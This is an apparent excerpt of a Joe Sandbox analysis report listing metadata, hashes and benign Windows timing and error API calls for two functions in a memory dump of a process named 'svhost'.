                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExceptionFileHeaderRaise
                                • String ID: csm
                                • API String ID: 2573137834-1018135373
                                • Opcode ID: cf093b9af91b8e168d1e1416f187956350758ab8b6ce70b2b6e25090191a9b62
                                • Instruction ID: d7e2a6cee67efed99d908ed842dcf2239900fad8b3b939cf701cc2f3888f1928
                                • Opcode Fuzzy Hash: cf093b9af91b8e168d1e1416f187956350758ab8b6ce70b2b6e25090191a9b62
                                • Instruction Fuzzy Hash: 91112E36619B8182EB259B19E840299B7E5FB8CB84F994235DECD07768DF3CD5518700
                                Function 00007FF7AF6F49D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                Download Yara Rule
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00007FF7AF672986), ref: 00007FF7AF6F49EE
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7AF672986), ref: 00007FF7AF6F4A08
                                  • Part of subcall function 00007FF7AF703760: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AF6F4A01,?,?,?,?,?,?,?), ref: 00007FF7AF70378E
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 158728112-2333694755
                                • Opcode ID: 623e1174f4cc92820e682686ae8cb3b95ff1514c819b1a2c265e94f745ff9430
                                • Instruction ID: 52048c13b72ca2497ed0908dc9d2813eb1673414b07812a96a59742e1cbe90dc
                                • Opcode Fuzzy Hash: 623e1174f4cc92820e682686ae8cb3b95ff1514c819b1a2c265e94f745ff9430
                                • Instruction Fuzzy Hash: EA016D7AE16A8699E710AB70D8412FC6374FB48354FD14A31CAAD036E4DF38D255C3A0